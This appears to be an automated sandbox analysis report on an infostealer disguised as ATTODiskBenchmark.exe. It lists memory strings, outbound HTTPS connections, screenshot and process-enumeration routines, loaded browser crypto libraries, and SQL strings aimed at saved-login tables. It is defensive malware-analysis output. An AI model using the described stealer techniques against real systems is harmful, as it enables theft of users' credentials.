                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00931F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00931F2A

                          System Summary

                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File dump: AttoConvertVideo.exe.0.dr 979379375
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092145B GetCurrentProcess,NtQueryInformationProcess,2_2_0092145B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CB89F30 appears 31 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009247E8 appears 38 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CA73620 appears 73 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009304BC appears 37 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CA79B10 appears 73 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009305DE appears 71 times
                          Source: 7ZthFNAqYp.exe Static PE information: Resource name: None type: DOS executable (COM)
                          Source: AttoConvertVideo.exe.0.dr Static PE information: Resource name: None type: DOS executable (COM)
                          Source: 7ZthFNAqYp.exeBinary or memory string: OriginalFilename vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000000.2134642418.000000000082F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332999034.0000000002E74000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3392292376.000000000082F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3417574339.000000006FD92000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exeBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/22@3/4
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6CAB0300
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0093147A
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_0093196C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\Music\AttoDesignerUpdater
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: 7ZthFNAqYp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125180358.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3102837907.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: 7ZthFNAqYp.exe ReversingLabs: Detection: 44%
                          Source: 7ZthFNAqYp.exe Virustotal: Detection: 44%
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File read: C:\Users\user\Desktop\7ZthFNAqYp.exe
                          Source: unknown Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msimg32.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: oleacc.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winmm.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: oledlg.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: k7rn7l32.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntd3ll.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rstrtmgr.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ncrypt.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntasn1.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dbghelp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: schannel.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mskeyprotect.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: sxs.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mozglue.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wsock32.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: vcruntime140.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msvcp140.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: vcruntime140.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windowscodecs.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntshrui.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: linkinfo.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                          Source: 7ZthFNAqYp.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 7ZthFNAqYp.exe Static file information: File size 5233152 > 1048576
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_CURSOR
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_BITMAP
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_ICON
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_MENU
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_DIALOG
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_STRING
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_ACCELERATOR
                          Source: 7ZthFNAqYp.exe Static PE information: section name: RT_GROUP_ICON
                          Source: 7ZthFNAqYp.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x25c800
                          Source: 7ZthFNAqYp.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x214200
                          Source: 7ZthFNAqYp.exe Static PE information: More than 200 imports for USER32.dll
                          Source: 7ZthFNAqYp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
